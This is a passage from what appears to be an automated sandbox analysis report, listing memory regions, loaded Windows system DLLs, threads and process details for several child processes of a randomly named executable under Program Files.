"private_0x0000000000030000" filename = "" Region: id = 6917 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6918 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6919 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6920 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6921 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6922 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6923 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6924 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6925 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6926 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6927 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6928 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6929 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6930 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7333 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 7334 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7335 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7336 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7337 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7338 start_va = 0x440000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 7339 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7340 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7341 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7342 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7343 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7344 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7662 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7663 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7664 start_va = 0x610000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7665 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 7666 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7667 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7668 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7669 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7670 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7671 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7672 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7673 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7674 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7675 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7676 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7677 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7678 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7679 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7680 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7681 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7682 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7683 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7821 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7822 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7823 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 7824 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 258 os_tid = 0x10d4 Thread: id = 282 os_tid = 0x5c4 Process: id = "91" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x5322a000" os_pid = "0x1234" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6938 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6939 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6940 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6941 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6942 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6943 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6944 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6945 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6946 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6947 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6948 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6949 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6950 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6951 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6952 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6953 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7358 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 7359 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7360 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7361 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7362 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7363 start_va = 0x4f0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 7364 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7365 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7708 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7709 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7710 start_va = 0x660000 end_va = 0x71dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7711 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7712 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7713 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 7714 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7715 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7716 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7717 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7718 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7719 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7720 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7721 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7722 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7723 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7724 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7725 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7726 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7727 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7728 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7729 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7825 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7826 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7827 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7828 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7829 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7830 start_va = 0x820000 end_va = 0x9a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 7831 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 259 os_tid = 0x10dc Thread: id = 283 os_tid = 0x5b0 Process: id = "92" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x53c2f000" os_pid = "0x10f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6961 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6962 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6963 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6964 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6965 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6966 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6967 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6968 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6969 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6970 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6971 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6972 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6973 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6974 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6975 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6976 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7366 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7367 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7368 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7369 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7370 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7371 start_va = 0x480000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 7372 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7373 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 